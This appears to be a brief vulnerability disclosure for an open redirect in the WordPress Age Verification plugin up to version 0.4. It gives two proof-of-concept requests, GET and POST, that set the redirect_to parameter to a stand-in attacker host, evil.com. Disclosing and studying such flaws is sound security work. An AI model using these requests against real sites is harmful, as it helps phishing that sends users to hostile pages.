WordPress Age Verification Plugin <= 0.4 Open Redirect

1)  Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com

    The rendered page will provide a link to http://www.evil.com

2)  Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
    redirect_to:    http://www.evil.com
    age_day:        1
    age_month:      1
    age_year:       1970

评论关闭。